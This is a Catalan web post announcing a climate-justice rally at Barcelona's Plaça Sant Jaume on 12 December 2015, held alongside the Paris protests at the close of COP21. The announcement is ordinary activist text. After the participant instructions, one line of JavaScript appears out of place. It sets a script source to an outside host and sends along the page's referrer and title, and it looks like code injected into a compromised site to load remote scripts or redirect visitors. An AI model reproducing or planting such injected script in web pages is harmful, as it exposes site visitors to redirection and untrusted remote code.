Més enllà de la COP21: Dissabte 12 desembre 2015, a les 12:00 h.

El Moviment per la Justícia Climàtica convoca una concentració per pressionar accions més enllà de la COP21

El passat 29 de novembre el Moviment per la Justícia Climàtica va marxar amb més de cinc mil persones pels carrers de Barcelona per mostrar la preocupació de la societat pel canvi climàtic i reclamar de acords radicals a la COP21 a l’alçada del repte global que amenaça a la humanitat i el planeta.

Davant la recta final de les negociacions i en vista que l’acord global no serà prou ambiciós com per reduïr les emissions a nivells segurs per el planeta, el Moviment per la Justicia Climàtica , crida aquest dissabte  a una concentració simultànea a la manifestació organitzada a París pel moviment social global (http://d12.paris/). Amb aquesta concentració volem demostrar als governs mundials que no només rebutgem aquest acord, sinó que seguirem construint les alternatives per viure en un món més just social i climàticament. La transició ja està en marxa, i no es pot aturar.

Quan: Dissabte 12 desembre 2015, a les 12:00 h. 
On: Ajuntament de Barcelona (Plaça Sant Jaume)

Participants: Porteu colors verds i vermells (roba, pancartes, mocadors) 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

This post is also available in: Spanish English